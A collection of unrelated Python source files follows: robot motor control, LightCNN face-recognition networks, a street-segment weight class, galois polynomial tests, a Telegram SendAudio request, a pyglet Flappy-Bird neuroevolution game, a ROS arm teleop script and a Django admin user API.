#-----------------------------------------------------------------------------------------------
def setMotorSpeeds( self, leftMotorSpeed, rightMotorSpeed ):
if self.robotConfig.usePresetMotorSpeeds:
maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()
else:
maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed
maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed
self.leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) )
self.rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) )
self.lastMotionCommandTime = time.time()
#-----------------------------------------------------------------------------------------------
def setNeckJoystickPos( self, joystickX, joystickY ):
joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY )
# Set pan and tilt angle speeds
self.panSpeed = -self.MAX_ABS_NECK_SPEED*joystickX
self.tiltSpeed = -self.MAX_ABS_NECK_SPEED*joystickY
self.lastMotionCommandTime = time.time()
#-----------------------------------------------------------------------------------------------
def setNeckAngles( self, panAngle, tiltAngle ):
self.panAngle = max( self.MIN_ANGLE, min( panAngle, self.MAX_ANGLE ) )
self.tiltAngle = max( self.MIN_ANGLE, min( tiltAngle, self.MAX_ANGLE ) )
self.panSpeed = 0.0
self.tiltSpeed = 0.0
self.lastMotionCommandTime = time.time()
#-----------------------------------------------------------------------------------------------
def _loadPiSensorModule( self ):
if self.robotConfig.piSensorModuleName != "":
# Try to import the new sensor module
newSensorModule = None
try:
newSensorModule = __import__( self.robotConfig.piSensorModuleName, fromlist=[''] )
except Exception as e:
logging.error( "Caught exception when trying to import Pi sensor module" )
logging.error( str( e ) )
if newSensorModule != None:
# We have a new sensor module. Shutdown any existing sensor reader
if self.piSensorReader != None:
self.piSensorReader.shutdown()
self.piSensorReader = None
# Remove reference to existing sensor module
self.piSensorModule = None
self.piSensorModuleName = ""
# Try to create the new Pi sensor reader
newSensorReader = None
try:
newSensorReader = newSensorModule.PiSensorReader()
except Exception as e:
logging.error( "Caught exception when trying to create Pi sensor reader" )
logging.error( str( e ) )
if newSensorReader != None:
self.piSensorModule = newSensorModule
self.piSensorModuleName = self.robotConfig.piSensorModuleName
self.piSensorReader = newSensorReader
#-----------------------------------------------------------------------------------------------
def update( self ):
if not self.miniDriver.isConnected():
return
curTime = time.time()
timeDiff = min( curTime - self.lastUpdateTime, self.MAX_UPDATE_TIME_DIFF )
# Turn off the motors if we haven't received a motion command for a while
if curTime - self.lastMotionCommandTime > self.MOTION_COMMAND_TIMEOUT:
self.leftMotorSpeed = 0.0
self.rightMotorSpeed = 0.0
self.panSpeed = 0.0
self.tiltSpeed = 0.0
# Update the pan and tilt angles
self.panAngle += self.panSpeed*timeDiff
self.tiltAngle += self.tiltSpeed*timeDiff
self.panAngle = max( self.MIN_ANGLE, min( self.panAngle, self.MAX_ANGLE ) )
self.tiltAngle = max( self.MIN_ANGLE, min( self.tiltAngle, self.MAX_ANGLE ) )
# Update the mini driver
self.miniDriver.setOutputs(
self.leftMotorSpeed, self.rightMotorSpeed, self.panAngle, self.tiltAngle )
self.miniDriver.update()
# Send servo settings if needed
if curTime - self.lastServoSettingsSendTime >= self.TIME_BETWEEN_SERVO_SETTING_UPDATES:
self.miniDriver.setPanServoLimits(
self.robotConfig.panPulseWidthMin,
self.robotConfig.panPulseWidthMax )
self.miniDriver.setTiltServoLimits(
self.robotConfig.tiltPulseWidthMin,
self.robotConfig.tiltPulseWidthMax )
self.lastServoSettingsSendTime = curTime
# Send sensor configuration if needed
if curTime - self.lastSensorConfigurationSendTime >= self.TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES:
self.miniDriver.setSensorConfiguration( self.robotConfig.miniDriverSensorConfiguration )
self.lastSensorConfigurationSendTime = curTime
# Change the Pi sensor module if needed
if self.robotConfig.piSensorModuleName != self.piSensorModuleName:
self._loadPiSensorModule()
# Read from any sensors attached to the Pi
if self.piSensorReader != None:
self.piSensorDict = {}
try:
self.piSensorDict = self.piSensorReader.readSensors()
except Exception as e:
logging.error( "Caught exception when trying to read from Pi sensor reader" )
logging.error( str( e ) )
self.lastUpdateTime = curTime |
py | 1a306736302e368bcf1a6fff563146cd6babb1ea | import torch
import torch.nn as nn
import torch.nn.functional as F
class mfm(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, type=1):
super(mfm, self).__init__()
self.out_channels = out_channels
if type == 1:
self.filter = nn.Conv2d(in_channels, 2*out_channels, kernel_size=kernel_size, stride=stride, padding=padding)
else:
self.filter = nn.Linear(in_channels, 2*out_channels)
def forward(self, x):
x = self.filter(x)
out = torch.split(x, self.out_channels, 1)
return torch.max(out[0], out[1])
class group(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding):
super(group, self).__init__()
self.conv_a = mfm(in_channels, in_channels, 1, 1, 0)
self.conv = mfm(in_channels, out_channels, kernel_size, stride, padding)
def forward(self, x):
x = self.conv_a(x)
x = self.conv(x)
return x
class resblock(nn.Module):
def __init__(self, in_channels, out_channels):
super(resblock, self).__init__()
self.conv1 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1)
self.conv2 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1)
def forward(self, x):
res = x
out = self.conv1(x)
out = self.conv2(out)
out = out + res
return out
class network_9layers(nn.Module):
def __init__(self, num_classes=79077):
super(network_9layers, self).__init__()
self.features = nn.Sequential(
mfm(1, 48, 5, 1, 2),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(48, 96, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(96, 192, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(192, 128, 3, 1, 1),
group(128, 128, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
)
self.fc1 = mfm(8*8*128, 256, type=0)
self.fc2 = nn.Linear(256, num_classes)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = F.dropout(x, training=self.training)
out = self.fc2(x)
return out, x
class network_29layers(nn.Module):
def __init__(self, block, layers, num_classes=79077):
super(network_29layers, self).__init__()
self.conv1 = mfm(1, 48, 5, 1, 2)
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)
self.block1 = self._make_layer(block, layers[0], 48, 48)
self.group1 = group(48, 96, 3, 1, 1)
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)
self.block2 = self._make_layer(block, layers[1], 96, 96)
self.group2 = group(96, 192, 3, 1, 1)
self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)
self.block3 = self._make_layer(block, layers[2], 192, 192)
self.group3 = group(192, 128, 3, 1, 1)
self.block4 = self._make_layer(block, layers[3], 128, 128)
self.group4 = group(128, 128, 3, 1, 1)
self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)
self.fc = mfm(8*8*128, 256, type=0)
self.fc2 = nn.Linear(256, num_classes)
def _make_layer(self, block, num_blocks, in_channels, out_channels):
layers = []
for i in range(0, num_blocks):
layers.append(block(in_channels, out_channels))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.pool1(x)
x = self.block1(x)
x = self.group1(x)
x = self.pool2(x)
x = self.block2(x)
x = self.group2(x)
x = self.pool3(x)
x = self.block3(x)
x = self.group3(x)
x = self.block4(x)
x = self.group4(x)
x = self.pool4(x)
x = x.view(x.size(0), -1)
fc = self.fc(x)
fc = F.dropout(fc, training=self.training)
out = self.fc2(fc)
return out, fc
class network_29layers_v2(nn.Module):
def __init__(self, block, layers, num_classes=79077):
super(network_29layers_v2, self).__init__()
self.conv1 = mfm(1, 48, 5, 1, 2)
self.block1 = self._make_layer(block, layers[0], 48, 48)
self.group1 = group(48, 96, 3, 1, 1)
self.block2 = self._make_layer(block, layers[1], 96, 96)
self.group2 = group(96, 192, 3, 1, 1)
self.block3 = self._make_layer(block, layers[2], 192, 192)
self.group3 = group(192, 128, 3, 1, 1)
self.block4 = self._make_layer(block, layers[3], 128, 128)
self.group4 = group(128, 128, 3, 1, 1)
self.fc = nn.Linear(8*8*128, 256)
self.fc2 = nn.Linear(256, num_classes[0], bias=False)
def _make_layer(self, block, num_blocks, in_channels, out_channels):
layers = []
for i in range(0, num_blocks):
layers.append(block(in_channels, out_channels))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block1(x)
x = self.group1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block2(x)
x = self.group2(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block3(x)
x = self.group3(x)
x = self.block4(x)
x = self.group4(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = x.view(x.size(0), -1)
fc = self.fc(x)
x = F.dropout(fc, training=self.training)
output = list()
for name, fun in self.fc_dict.iteritems():
out = fun(x)
output.append(out)
return output, fc
class network_9layers_templet(nn.Module):
def __init__(self, in_channel):
super(network_9layers_templet, self).__init__()
self.features = nn.Sequential(
mfm(in_channel, 48, 5, 1, 2),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(48, 96, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(96, 192, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(192, 128, 3, 1, 1),
group(128, 128, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
)
self.fc1 = mfm(8*8*128, 256, type=0)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
out = F.dropout(x, training=self.training)
return out
class network_29layers_v2_templet(nn.Module):
def __init__(self, in_channel, block, layers):
super(network_29layers_v2_templet, self).__init__()
self.conv1 = mfm(in_channel, 48, 5, 1, 2)
self.block1 = self._make_layer(block, layers[0], 48, 48)
self.group1 = group(48, 96, 3, 1, 1)
self.block2 = self._make_layer(block, layers[1], 96, 96)
self.group2 = group(96, 192, 3, 1, 1)
self.block3 = self._make_layer(block, layers[2], 192, 192)
self.group3 = group(192, 256, 3, 1, 1)
self.block4 = self._make_layer(block, layers[3], 256, 256)
self.group4 = group(256, 128, 3, 1, 1)
self.block5 = self._make_layer(block, layers[4], 128, 128)
self.group5 = group(128, 64, 3, 1, 1)
self.block6 = self._make_layer(block, layers[5], 64, 64)
self.group6 = group(64, 64, 3, 1, 1)
self.fc = nn.Linear(8*8*64, 256)
def _make_layer(self, block, num_blocks, in_channels, out_channels):
layers = []
for i in range(0, num_blocks):
layers.append(block(in_channels, out_channels))
return nn.Sequential(*layers)
def forward(self, x):
'''
x = self.conv1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block1(x)
x = self.group1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block2(x)
x = self.group2(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block3(x)
x = self.group3(x)
x = self.block4(x)
x = self.group4(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = x.view(x.size(0), -1)
fc = self.fc(x)
x = F.dropout(fc, training=self.training)
'''
x = self.conv1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block1(x)
x = self.group1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block2(x)
x = self.group2(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block3(x)
x = self.group3(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block4(x)
x = self.group4(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block5(x)
x = self.group5(x)
x = self.block6(x)
x = self.group6(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = x.view(x.size(0), -1)
fc = self.fc(x)
x = F.dropout(fc, training=self.training)
return x
def LightCNN_9Layers(**kwargs):
model = network_9layers(**kwargs)
return model
def LightCNN_29Layers(**kwargs):
model = network_29layers(resblock, [1, 2, 3, 4], **kwargs)
return model
def LightCNN_29Layers_v2(**kwargs):
model = network_29layers_v2(resblock, [1, 2, 3, 4], **kwargs)
return model
def LightCNN_9Layers_templet(in_channel, pretrained=False):
model = network_9layers_templet(in_channel)
return model
def LightCNN_29Layers_v2_templet(in_channel, pretrained=False):
model = network_29layers_v2_templet(in_channel, resblock, [1,2,3,4,5,6])
return model
if __name__ == "__main__":
model = LightCNN_29Layers_v2_templet(3)
print(model) |
py | 1a306781b92398cd07a55977d0c140895c09d105 | """
``street.py``
=============
Módulo para o peso de um trecho de rua
"""
from __future__ import annotations
from protocols import Weightable
from random import choice
from functools import total_ordering
from typing import Optional, List, Any, Dict
#: Incluir velocidade máxima entre as possibilidades
#: de velocidade assumida naquele trecho de rua
INCLUDE_MAX_SPEED = False
@total_ordering
class Street(Weightable):
"""
Classe de peso (:class:`Weightable`) do trecho da rua
Assim que a propriedade :attr:`~street.Street.speed` é
lida pela primeira vez, ela assume um valor que é mantido
com ela durante a vida do objeto.
No entanto, quuando essa instância é copiada com :func:`copy.deepcopy`,
essa propriedade é desconfigurada e ela pode assumir um novo
valor.
:param distance: distância do trecho
:param max_speed: velocidade máxima do trecho
"""
def __init__(self, distance: float, max_speed: float):
self._distance = distance
self._max_speed = max_speed
self._latest_speeds: List[float] = []
self._speed: Optional[float] = None
def register_speeds(self, *speeds: float) -> None:
"""Registra as velocidades atuais no trecho"""
self._latest_speeds += list(speeds)
@property
def speed(self) -> float:
"""Velocidade assumida no trecho"""
if self._speed is None:
if INCLUDE_MAX_SPEED:
self._speed = choice(self._latest_speeds + [self._max_speed])
elif self._latest_speeds:
self._speed = choice(self._latest_speeds)
else:
self._speed = self._max_speed
return self._speed
@property
def distance(self) -> float:
"""distância do trecho"""
return self._distance
@property
def time(self) -> float:
"""tempo no trecho, com a velocidade assumida
Usado para a comparação entre trechos
"""
if self.speed:
return self.distance / self.speed
else:
return float('inf')
def is_inf(self) -> bool:
"""Se a velocidade assumida representa um tempo infinito"""
return not self.speed
def __eq__(self, other: Any) -> bool:
return isinstance(other, Street) and self.time == other.time
def __lt__(self, other: Any) -> bool:
return isinstance(other, Street) and self.time < other.time
def __add__(self, other: Street) -> Street:
"""A soma dos trechos equivale a soma dos tempos"""
d1, d2 = self.distance, other.distance
s1, s2 = self.speed, other.speed
distance = d1 + d2
if not s1 or not s2:
speed = 0.0
else:
speed = (distance * s1 * s2) / (d1 * s2 + d2 * s1)
return Street(distance, speed)
def __repr__(self) -> str:
return repr(self.time)
def __deepcopy__(self, memo: Dict[int, Any]) -> Street:
"""Cópia especial que não mantém a velocidade assumida"""
new = Street(self.distance, self._max_speed)
new.register_speeds(*self._latest_speeds)
memo[id(self)] = new
return new
|
py | 1a3067addfccb44f5e88596ca682d20c01dcaa28 | """
A pytest module to test Galois field polynomial alternate constructors.
"""
import numpy as np
import pytest
import galois
FIELDS = [
galois.GF2, # GF(2)
galois.GF(31), # GF(p) with np.int dtypes
galois.GF(36893488147419103183), # GF(p) with object dtype
galois.GF(2**8), # GF(2^m) with np.int dtypes
galois.GF(2**100), # GF(2^m) with object dtype
galois.GF(7**3), # GF(p^m) with np.int dtypes
galois.GF(109987**4), # GF(p^m) with object dtypes
]
@pytest.mark.parametrize("field", FIELDS)
def test_zero(field):
p = galois.Poly.Zero(field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 0
assert np.array_equal(p.nonzero_degrees, [])
assert np.array_equal(p.nonzero_coeffs, [])
assert np.array_equal(p.degrees, [0])
assert np.array_equal(p.coeffs, [0])
assert p.integer == 0
@pytest.mark.parametrize("field", FIELDS)
def test_one(field):
p = galois.Poly.One(field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 0
assert np.array_equal(p.nonzero_degrees, [0])
assert np.array_equal(p.nonzero_coeffs, [1])
assert np.array_equal(p.degrees, [0])
assert np.array_equal(p.coeffs, [1])
assert p.integer == 1
@pytest.mark.parametrize("field", FIELDS)
def test_identity(field):
p = galois.Poly.Identity(field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 1
assert np.array_equal(p.nonzero_degrees, [1])
assert np.array_equal(p.nonzero_coeffs, [1])
assert np.array_equal(p.degrees, [1,0])
assert np.array_equal(p.coeffs, [1,0])
assert p.integer == field.order
@pytest.mark.parametrize("field", FIELDS)
def test_random(field):
p = galois.Poly.Random(2, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 2
@pytest.mark.parametrize("field", FIELDS)
def test_integer(field):
integer = field.order + 1 # Corresponds to p(x) = x + 1
p = galois.Poly.Integer(integer, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 1
assert np.array_equal(p.nonzero_degrees, [1,0])
assert np.array_equal(p.nonzero_coeffs, [1,1])
assert np.array_equal(p.degrees, [1,0])
assert np.array_equal(p.coeffs, [1,1])
assert p.integer == integer
@pytest.mark.parametrize("field", FIELDS)
def test_degrees(field):
# Corresponds to p(x) = x^2 + 1
degrees = [2,0]
coeffs = [1,1]
p = galois.Poly.Degrees(degrees, coeffs, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 2
assert np.array_equal(p.nonzero_degrees, [2,0])
assert np.array_equal(p.nonzero_coeffs, [1,1])
assert np.array_equal(p.degrees, [2,1,0])
assert np.array_equal(p.coeffs, [1,0,1])
assert p.integer == field.order**2 + 1
@pytest.mark.parametrize("field", FIELDS)
def test_roots(field):
a, b = field.Random(), field.Random()
roots = [a, b] # p(x) = (x - a)*(x - b)
degree = 2
degrees = [2, 1, 0]
coeffs = [1, -a + -b, (-a)*(-b)]
nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0]
nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0]
integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)])
p = galois.Poly.Roots(roots, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == degree
assert np.array_equal(p.nonzero_degrees, nonzero_degrees)
assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs)
assert np.array_equal(p.degrees, degrees)
assert np.array_equal(p.coeffs, coeffs)
assert p.integer == integer
@pytest.mark.parametrize("field", FIELDS)
def test_roots_with_multiplicity(field):
a = field.Random()
roots = [a] # p(x) = (x - a)*(x - a)
multiplicities = [2]
degree = 2
degrees = [2, 1, 0]
coeffs = [1, -a + -a, (-a)*(-a)]
nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0]
nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0]
integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)])
p = galois.Poly.Roots(roots, multiplicities=multiplicities, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == degree
assert np.array_equal(p.nonzero_degrees, nonzero_degrees)
assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs)
assert np.array_equal(p.degrees, degrees)
assert np.array_equal(p.coeffs, coeffs)
assert p.integer == integer
|
py | 1a3067bc4e8a963488a35ed23b8bd57e5673563c | # Copyright (C) 2015-2022 by Vd.
# This file is part of Rocketgram, the modern Telegram bot framework.
# Rocketgram is released under the MIT License (see LICENSE).
from dataclasses import dataclass
from typing import Union, Optional, List
from .input_file import InputFile
from .message_entity import MessageEntity
from .parse_mode_type import ParseModeType
from .request import Request
from .utils import ALL_KEYBOARDS, MessageResultMixin
@dataclass(frozen=True)
class SendAudio(MessageResultMixin, Request):
"""\
Represents SendAudio request object:
https://core.telegram.org/bots/api#sendaudio
"""
chat_id: Union[int, str]
audio: Union[InputFile, str]
caption: Optional[str] = None
parse_mode: Optional[ParseModeType] = None
caption_entities: Optional[List[MessageEntity]] = None
duration: Optional[int] = None
performer: Optional[str] = None
title: Optional[str] = None
thumb: Optional[Union[InputFile, str]] = None
disable_notification: Optional[bool] = None
protect_content: Optional[bool] = None
reply_to_message_id: Optional[int] = None
allow_sending_without_reply: Optional[bool] = None
reply_markup: Optional[ALL_KEYBOARDS] = None
def files(self) -> List[InputFile]:
out = list()
if isinstance(self.audio, InputFile):
out.append(self.audio)
if isinstance(self.thumb, InputFile):
out.append(self.thumb)
return out
|
py | 1a3068a3585c91ebdc0587aa47980a1f82baca30 | import pyglet
from pyglet.window import key
from pyglet.window.key import MOD_SHIFT
from CGP import Individual, create_pop, evolve
from load import *
game_window = pyglet.window.Window(1600, 1000)
pyglet.resource.path = ['../assets']
pyglet.resource.reindex()
main_batch = pyglet.graphics.Batch()
pillar_batch = pyglet.graphics.Batch()
ai_batch = pyglet.graphics.Batch()
label_score = labels(batch=main_batch)
label_alive = labels(y=520, batch=main_batch)
label_best = labels(y=540, batch=main_batch)
label_generation = labels(y=560, batch=main_batch)
pillars = new_pillar(pillar_batch)
completion = False
score = 0
best_score = 0 # FIXME
time_count = 0
flag = 0
alive = 0
generation = 1
ai_num = ""
pop = None
birds_obj = []
ai_birds_obj = []
def create_ai_bird(pops):
global alive, ai_num
for ind in pops:
ai_birds_obj.append(new_ai_birds(individual=ind, batch=ai_batch))
alive += 1
ai_num = str(alive)
def clear_game():
global pillars, generation, score, time_count
for obj in pillars:
obj.delete()
pillars.remove(obj)
for obj in birds_obj:
obj.delete()
birds_obj.remove(obj)
generation += 1
score = 0
time_count = 0
pillars = new_pillar(pillar_batch)
def init():
global birds_obj, score
score = 0
label_score.text = "Score: " + str(score)
birds_obj.append(new_birds(main_batch))
def init_pop():
global ai_birds_obj, alive, ai_num, pop
pop = create_pop(10)
create_ai_bird(pop)
label_alive.text = "Alive: " + str(alive) + "/" + ai_num
label_generation.text = "Generation: " + str(generation)
label_best.text = "Best score: " + str(best_score)
@game_window.event
def on_draw():
global completion
game_window.clear()
main_batch.draw()
pillar_batch.draw()
ai_batch.draw()
for b in birds_obj:
game_window.push_handlers(b.get_key_handler())
@game_window.event
def on_key_press(symbol, modifiers):
# add a new player bird
if modifiers & MOD_SHIFT:
if symbol == key.N:
birds_obj.extend([new_birds(main_batch)])
# make it faster
if modifiers & MOD_SHIFT:
if symbol == key.EQUAL:
print("speed up")
pyglet.clock.schedule_interval(update, 1 / 120.0)
# make it stop
if modifiers & MOD_SHIFT:
if symbol == key.BACKSPACE:
print("stop")
pyglet.clock.unschedule(update)
def update(dt):
global completion, score, time_count, flag, alive, pop, best_score
time_count += 1
# update
for b in birds_obj:
b.update(dt)
# check collide
if b.collide_down(pillars[0]) or b.collide_up(pillars[1]):
b.dead = True
for p in pillars:
p.update(dt)
for b in ai_birds_obj:
if b.collide_down(pillars[0]) or b.collide_up(pillars[1]):
b.dead = True
b.update(dt)
# flap or not
b.check_flap(pillars[0].x, pillars[0].y)
# check pillars out of bounds
if pillars[0].check_bounds():
pillars[0].dead = True
pillars[1].dead = True
# remove dead objects
for to_remove in [obj for obj in pillars if obj.dead]:
to_remove.delete()
pillars.remove(to_remove)
for to_remove in [obj for obj in birds_obj if obj.dead]:
to_remove.delete()
birds_obj.remove(to_remove)
for to_remove in [obj for obj in ai_birds_obj if obj.dead]:
alive -= 1
to_remove.delete()
ai_birds_obj.remove(to_remove)
# add new pillars and reset flag for score
if time_count % 240 == 0:
time_count = 0
flag = 0
add_pillars = new_pillar(pillar_batch)
pillars.extend(add_pillars)
# label
# score
if flag == 0 and (len(birds_obj) > 0 or len(ai_birds_obj) > 0) and pillars[0].check_score():
# print(time_count)
flag += 1
score += 1
label_score.text = "Score: " + str(int(score))
# check alive AI
label_alive.text = "Alive: " + str(alive) + "/" + ai_num
# check best score
if score > best_score:
best_score = score
label_best.text = "Best score: " + str(best_score)
# check generation
label_generation.text = "Generation: " + str(generation)
# evolve AI
if alive == 0:
pop = evolve(pop, 0.03, 4, 6)
clear_game()
create_ai_bird(pop)
if __name__ == '__main__':
init()
init_pop()
# init_ai()
pyglet.clock.schedule_interval(update, 1 / 120.0)
pyglet.app.run()
|
py | 1a306966b719ef85a751c4fa1585f2a559fe9a4c | r"""
Remote (pmaf.remote)
====================
Exploit remote databases
------------------------
Classes
-------
.. autosummary::
:toctree: generated/
Entrez
"""
from ._entrez import Entrez
__all__ = ['Entrez'] |
py | 1a306a2a2dcf52f5e93c5095b38aed6e762c91ea | import rospy
from std_msgs.msg import Float64
import sys, select, termios, tty
msg = """
Move the Arm Links !!
---------------------------
Rotating (i), Picking(l) and Jaw Arm(o):
u i o
j k l
m , .
space key, k : force stop
anything else : stop smoothly
CTRL-C to quit
"""
moveBindings = {
'i':(1,0),
'o':(1,-1),
'j':(0,1),
'l':(0,-1),
'u':(1,1),
',':(-1,0),
'.':(-1,1),
'm':(-1,-1),
}
speedBindings={
'q':(1.1,1.1),
'z':(.9,.9),
'w':(1.1,1),
'x':(.9,1),
'e':(1,1.1),
'c':(1,.9),
}
def getKey():
tty.setraw(sys.stdin.fileno())
rlist, _, _ = select.select([sys.stdin], [], [], 0.1)
if rlist:
key = sys.stdin.read(1)
else:
key = ''
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
speed = 0.1
turn = 0.8
def vels(speed,turn):
return "currently:\tspeed %s\tturn %s " % (speed,turn)
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('arm_teleop')
pub_pick = rospy.Publisher('/robot_arm/picking_arm_controller/command', Float64, queue_size = 10) # Picking Arm controller
pub_rotate = rospy.Publisher('/robot_arm/rotating_arm_controller/command', Float64, queue_size = 10) # Rotating Arm controller
pub_jaw = rospy.Publisher('/robot_arm/jaw_arm_controller/command', Float64, queue_size = 10) # Jaw Arm controller
x = 1
th = 0
status = 0
count = 0
acc = 0.1
target_speed = 0
target_turn = 0
control_speed = 0
control_turn = 0
speed = 8
try:
print msg
print vels(speed,turn)
while(1):
key = getKey()
if key in moveBindings.keys():
x = moveBindings[key][0]
th = moveBindings[key][1]
count = 0
elif key in speedBindings.keys():
speed = speed * speedBindings[key][0]
turn = turn * speedBindings[key][1]
count = 0
print vels(speed,turn)
if (status == 14):
print msg
status = (status + 1) % 15
elif key == ' ' or key == 'k' :
x = 0
th = 0
control_speed = 0
control_turn = 0
else:
count = count + 1
if count > 10:
x = 0
th = 0
pass
if (key == '\x03'):
break
target_speed = speed * x
target_turn = turn * th
if target_speed > control_speed:
control_speed = min( target_speed, control_speed + 0.02 )
elif target_speed < control_speed:
control_speed = max( target_speed, control_speed - 0.02 )
else:
control_speed = target_speed
if target_turn > control_turn:
control_turn = min( target_turn, control_turn + 0.1 )
elif target_turn < control_turn:
control_turn = max( target_turn, control_turn - 0.1 )
else:
control_turn = target_turn
pub_pick.publish(control_turn) # Picking Arm speed
pub_rotate.publish(control_speed) # Rotating Arm speed
pub_jaw.publish(control_turn) # Jaw Arm speed
except:
print e
finally:
pub_pick.publish(control_turn) # Picking Arm speed
pub_rotate.publish(control_speed) # Rotating Arm speed
pub_jaw.publish(control_turn) # Jaw Arm speed
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
|
py | 1a306abb7ff91026b161aeec3c83ee5cd270bbb2 | import os
import argus
_example = argus.EXAMPLE_DRAG_CLOTH
python_path = os.path.dirname(os.path.realpath(__file__))
argus_interface = os.path.join(python_path, 'argus_interface.py')
os.system('python {} -e {}'.format(argus_interface, _example)) |
py | 1a306b2e32fa597fe500c61d1affcd6e636d84e9 | import os
import re
import xlsxwriter
from django.db import transaction, IntegrityError
from django.db.models import Q
from django.http import HttpResponse
from django.contrib.auth.hashers import make_password
from submission.models import Submission
from utils.api import APIView, validate_serializer
from utils.shortcuts import rand_str
from ..decorators import super_admin_required
from ..models import AdminType, ProblemPermission, User, UserProfile
from ..serializers import EditUserSerializer, UserAdminSerializer, GenerateUserSerializer
from ..serializers import ImportUserSeralizer
class UserAdminAPI(APIView):
@validate_serializer(ImportUserSeralizer)
@super_admin_required
def post(self, request):
"""
Import User
"""
data = request.data["users"]
user_list = []
for user_data in data:
if len(user_data) != 3 or len(user_data[0]) > 32:
return self.error(f"Error occurred while processing data '{user_data}'")
user_list.append(User(username=user_data[0], password=make_password(user_data[1]), email=user_data[2]))
try:
with transaction.atomic():
ret = User.objects.bulk_create(user_list)
UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret])
return self.success()
except IntegrityError as e:
# Extract detail from exception message
# duplicate key value violates unique constraint "user_username_key"
# DETAIL: Key (username)=(root11) already exists.
return self.error(str(e).split("\n")[1])
@validate_serializer(EditUserSerializer)
@super_admin_required
def put(self, request):
"""
Edit user api
"""
data = request.data
if not data["sno"].isdigit():
return self.error("Student ID must be digital")
try:
user = User.objects.get(id=data["id"])
except User.DoesNotExist:
return self.error("User does not exist")
if User.objects.filter(username=data["username"].lower()).exclude(id=user.id).exists():
return self.error("Username already exists")
if User.objects.filter(email=data["email"].lower()).exclude(id=user.id).exists():
return self.error("Email already exists")
if User.objects.filter(sno=data["sno"]).exclude(id=user.id).exists():
return self.error("Student ID already exists")
pre_username = user.username
user.username = data["username"].lower()
user.sno = data["sno"]
user.email = data["email"].lower()
user.admin_type = data["admin_type"]
user.is_disabled = data["is_disabled"]
if data["admin_type"] == AdminType.ADMIN:
user.problem_permission = data["problem_permission"]
elif data["admin_type"] == AdminType.SUPER_ADMIN:
user.problem_permission = ProblemPermission.ALL
else:
user.problem_permission = ProblemPermission.NONE
if data["password"]:
user.set_password(data["password"])
if data["open_api"]:
# Avoid reset user appkey after saving changes
if not user.open_api:
user.open_api_appkey = rand_str()
else:
user.open_api_appkey = None
